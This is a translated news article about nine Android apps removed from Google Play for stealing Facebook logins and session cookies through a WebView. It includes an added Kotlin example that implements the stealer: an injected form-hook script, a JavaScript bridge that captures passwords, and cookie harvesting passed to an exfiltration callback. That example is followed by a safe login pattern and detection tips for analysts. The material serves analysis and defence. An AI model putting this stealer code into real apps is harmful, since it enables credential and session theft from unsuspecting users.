Nine malicious apps found on Google Play stealing Facebook login credentials
2021-07-06 qq6630204qq
Article translation

Google LLC has removed nine Android apps from the Play Store, including one with millions of users, after they were found to be stealing users' Facebook Inc. login credentials.
Original translation: Longteng Net, http://www.ltaaa.cn. Please credit the source when reposting.


Discovered and detailed on July 1 by malware analysts at Dr. Web (a Russian antivirus vendor), the apps, described as "stealer Trojans," were distributed as harmless software and were installed nearly 6 million times. Unlike some previous cases in which malicious Android apps were discovered, the apps in this case all provided working, legitimate functionality: photo editing and framing, exercise and training, horoscopes and junk file removal.

The apps included PIP Photo, with up to 5 million installs; Processing Photo, with up to 500,000 installs; Rubbish Cleaner, Horoscope Daily and Inwell Fitness, with up to 100,000 installs each; and App Lock Keep, with up to 50,000 installs. Lockit Master, Horoscope Pi and App Lock Manager rounded out the list.

Common to all of the apps was an offer to disable in-app advertising by logging into a Facebook account. The analysts noted that "the advertisements inside some of the apps were indeed present and this maneuver was intended to further encourage Android device owners to perform the required actions."

Users who selected the option were then presented with a standard Facebook login, but with a difference: the genuine Facebook login page was shown inside a WebView controlled by the app, with JavaScript also loaded into the page to hijack the credentials entered into it.

When users entered their Facebook login details, the JavaScript sent the credentials to the attacker's command-and-control server, while the users were none the wiser, since they had in fact logged into Facebook successfully. After the victims logged in, the Trojan also stole the cookies of the current authorization session, which can be replayed to reuse the authenticated session without the password.
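The mechanism described in the two paragraphs above, as an added example in Kotlin that is not code from the Dr. Web report or from any of the apps. It models the stealer pattern an analyst would look for in the decompiled app (a WebView that loads the real login page, injects a form hook once the page has rendered, and then reads the session cookies), followed by the pattern a legitimate app should use instead. The login URL, the form field names (`email`, `pass`), the bridge name `StealerBridge` and the `exfiltrate` callback standing in for the command-and-control transport are all assumptions, not details taken from the report.

```kotlin
import android.annotation.SuppressLint
import android.content.Context
import android.net.Uri
import android.webkit.CookieManager
import android.webkit.JavascriptInterface
import android.webkit.WebView
import android.webkit.WebViewClient
import androidx.browser.customtabs.CustomTabsIntent

// Assumption: the article does not name the URL the apps loaded; the mobile login page is used here.
private const val FB_LOGIN_URL = "https://m.facebook.com/login.php"

// Script injected into the genuine login page after it has rendered. It hooks the login
// form's submit event, reads the credential fields (the names `email` and `pass` are an
// assumption about the form) and hands them to the host app through a JavaScript bridge.
// The real submission still goes ahead, so the victim ends up logged in and sees nothing odd.
private const val FORM_HOOK_JS = """
(function () {
  var form = document.querySelector('form');
  if (!form) return;
  form.addEventListener('submit', function () {
    var user = form.querySelector('input[name=email]');
    var pass = form.querySelector('input[name=pass]');
    if (user && pass) StealerBridge.onCredentials(user.value, pass.value);
  }, true);
})();
"""

// Bridge object exposed to page script under the (hypothetical) name "StealerBridge".
class StealerBridge(private val onCaptured: (user: String, pass: String) -> Unit) {
    @JavascriptInterface
    fun onCredentials(user: String, pass: String) = onCaptured(user, pass)
}

// The stealer pattern: a WebView the app fully controls renders the real Facebook login page.
// `exfiltrate` stands in for whatever transport the trojan uses to reach its C2 server.
@SuppressLint("SetJavaScriptEnabled")
fun showHijackedLogin(webView: WebView, exfiltrate: (payload: String) -> Unit) {
    webView.settings.javaScriptEnabled = true
    webView.addJavascriptInterface(StealerBridge { user, pass ->
        exfiltrate("""{"user":"$user","pass":"$pass"}""")
    }, "StealerBridge")
    webView.webViewClient = object : WebViewClient() {
        override fun onPageFinished(view: WebView, url: String) {
            if (!url.contains("facebook.com")) return
            // Stage 1: inject the form hook into the genuine page.
            view.evaluateJavascript(FORM_HOOK_JS, null)
            // Stage 2: once the login round-trip has completed, the authenticated session's
            // cookies are readable from the WebView's cookie store and go to the same place.
            CookieManager.getInstance().getCookie(url)?.let { cookies ->
                exfiltrate("""{"cookies":"$cookies"}""")
            }
        }
    }
    webView.loadUrl(FB_LOGIN_URL)
}

// What a legitimate app should do instead: hand the login to the system browser via
// Custom Tabs (or use the official Facebook Login SDK). The app then cannot attach a
// JavascriptInterface, inject script into the page, or read the browser's cookie jar.
fun showSafeLogin(context: Context) {
    CustomTabsIntent.Builder().build().launchUrl(context, Uri.parse(FB_LOGIN_URL))
}
```

The split between the two functions is the practical takeaway: a third-party app that renders a Facebook (or any other) login page inside its own UI, rather than bouncing to the browser or the official app, has full control over that page, and the user has no way to tell a clean WebView from one running `showHijackedLogin`. For an analyst, the triad of `addJavascriptInterface` or `evaluateJavascript`, a hard-coded login URL for a service the app does not belong to, and `CookieManager.getCookie` is the thing to grep for in decompiled code.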


Although those behind the apps targeted Facebook accounts, the same Trojans could have targeted accounts on other services. "The attackers could have easily changed the trojans' settings and commanded them to load the web page of another legitimate service," the analysts explained. "They could have even used a completely fake login form located on a phishing site. Thus, the trojans could have been used to steal logins and passwords from any service."

Google has not yet made a public statement on the apps. Ars Technica reported Friday that the apps have been removed from the store, and a Google spokesperson told Ars Technica that the apps' developers have also been banned.
